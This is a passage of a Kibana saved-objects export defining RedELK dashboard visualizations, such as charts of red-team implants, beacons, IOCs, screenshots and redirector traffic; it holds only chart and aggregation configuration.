"{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Tactics\"}"}, "coreMigrationVersion": "7.16.3", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 115], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.source\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 117], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Modules results donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Modules results donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"split\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.last_run.status\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"row\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 119], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC Types tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Types\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - IOC Types tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 121], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Screenshots total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 123], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Alarmed IOC\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Alarmed IOC\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Alarmed IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 125], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Downloads\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Downloads per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 127], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links external", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) \",\"openLinksInNewTab\":true},\"title\":\"RedELK - Dashboard links external\"}"}, "coreMigrationVersion": "7.16.3", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642171875895, 128], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Techniques unique count total ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"threat.technique.id\",\"customLabel\":\"MITRE ATT&CK Techniques\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - TTP Techniques unique count total \"}"}, "coreMigrationVersion": "7.16.3", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 130], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "title": "RedELK - HTTP Redir filters", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir filters\",\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1627506187584\",\"fieldName\":\"redir.backend.name\",\"parent\":\"\",\"label\":\"Backend\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1627507362404\",\"fieldName\":\"source.as.organization.name\",\"parent\":\"\",\"label\":\"ASN\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"},{\"id\":\"1627507398459\",\"fieldName\":\"source.geo.country_iso_code\",\"parent\":\"\",\"label\":\"Country\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_2_index_pattern\"},{\"id\":\"1627507415074\",\"fieldName\":\"tags\",\"parent\":\"\",\"label\":\"Tags\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_3_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":true,\"pinFilters\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_1_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_2_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_3_index_pattern", "type": "index-pattern"}], "sort": [1642171875895, 135], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Implants total count ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Implants\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Implants total count \"}"}, "coreMigrationVersion": "7.16.3", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 137], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 139], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Alarmed IP\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Redirector traffic alarmed IP total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 141], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per host", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per host\"}"}, "coreMigrationVersion": "7.16.3", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 143], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Screenshots per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 145], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per user\"}"}, "coreMigrationVersion": "7.16.3", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 147], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Alarmed IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 149], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-4w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\",\"defaultYExtents\":false,\"setYExtents\":false},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Downloads\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Downloads\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - CS - Downloads over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 151], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top new implants by ext IP address and scenario", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of new implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.ip_ext\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Redirector 